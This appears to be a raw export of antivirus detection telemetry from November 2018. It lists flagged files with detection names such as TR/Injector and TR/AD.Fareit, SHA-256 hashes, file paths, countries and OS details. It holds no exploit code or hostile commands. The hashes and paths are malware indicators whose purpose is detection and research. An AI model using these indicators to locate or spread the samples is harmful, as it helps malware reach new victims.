  Row(detection=Row(filename='avscan-20181102-055142-5825ebfb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055142-5825EBFB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051033-98b27536', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051033-98B27536', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050944-7b517d55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050944-7B517D55', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054747-cc52b3dc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054747-CC52B3DC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061136-1fdbdb4d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061136-1FDBDB4D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052359-7922a0c0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052359-7922A0C0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050451-ccdc2079', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050451-CCDC2079', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053454-ff5e2cb2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053454-FF5E2CB2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062514-0787768f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062514-0787768F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062651-416a21fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062651-416A21FB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054927-07cca6ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054927-07CCA6CA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062535-13d057a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062535-13D057A0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061908-2d1e3c3a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061908-2D1E3C3A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060013-88a918a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060013-88A918A6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061129-1bd1ea57', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061129-1BD1EA57', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061839-1c338f3c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061839-1C338F3C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051605-5e74e375', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051605-5E74E375', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055018-263465b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055018-263465B8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062507-030a0ed7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062507-030A0ED7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062005-4f32d667', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062005-4F32D667', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052802-0a155dc1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052802-0A155DC1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052327-65f1f3ba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052327-65F1F3BA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054731-c2bb3ca2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054731-C2BB3CA2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062156-91617f5e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062156-91617F5E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051239-e39ffaa4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051239-E39FFAA4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062034-6067defc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062034-6067DEFC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054838-ea676405', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054838-EA676405', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061401-7673a095', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061401-7673A095', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051735-9421e48b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051735-9421E48B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055722-22ff1f80', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055722-22FF1F80', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062115-78f516a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062115-78F516A6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='f_01322f', filepath='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_01322f', filesize=176000, name='HTML/Crypted.Gen.#M1.#R1'), hash='747fc452007f8aaa5f79d54c7b4daa36da7455fc6854331b54d07481f3da55bf', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1589080, timestamp='2018-11-02T10:36:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050851-5b79ccc1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050851-5B79CCC1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062318-c1ff5b86', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062318-C1FF5B86', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060209-cdd887ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060209-CDD887CE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062140-88088e56', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062140-88088E56', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054413-4c672bd9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054413-4C672BD9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062200-93dcf7c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062200-93DCF7C6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051953-e618ea76', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051953-E618EA76', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062149-8d3b80c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062149-8D3B80C6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060703-7cebd548', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060703-7CEBD548', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060941-db566ad3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060941-DB566AD3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T08:07:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060950-e09e1a01', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060950-E09E1A01', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-033603-e8d37f9f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-033603-E8D37F9F', filesize=64000, name='TR/Dropper.Gen.#M300.#R3497'), hash='81c7884894c8204284fcd9a931ecc21e5091366ac3e6b0bb22d16d65b6f7dce4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:38:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051731-91cc32c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051731-91CC32C4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055750-337ab952', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055750-337AB952', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp8034363\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:T\\\\\\/ZhdDu0ExtMx3ZpYqIODFRnjg \\\\\\/mnl', country='CL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\aTube_Catcher_0223243035.exe', parentsize=2610712, timestamp='2018-11-01T15:12:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-164918-f2dc2997', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_60a6277a\\AVSCAN-20181101-164844-ECFF01C0\\AVSCAN-20181101-164918-F2DC2997', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:49:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154830-76001601', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154830-76001601', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:48:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ioce56244b8-37af-a04f-a3e8-9cd9e141fd72', filepath='C:\\ProgramData\\Kaspersky Lab\\AVP19.0.0\\Temp\\iocE56244B8-37AF-A04F-A3E8-9CD9E141FD72', filesize=512000, name='TR/Crypt.XPACK.Gen.#M300.#R2423'), hash='39b62c5ea53e09be29e305c074060ffae5087767274785bfaa0cf2d5dde581ad', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 19.0.0\\avp.exe', parentsize=619640, timestamp='2018-11-01T10:46:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='135464244321145.acv', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\135464244321145.acv', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:24:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110812-abd1d73f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_735ad0b6\\AVSCAN-20181101-110711-A0F208E5\\AVSCAN-20181101-110812-ABD1D73F', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:08:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T03:49:49Z'), dt=datetime.date(2018, 11, 1)),
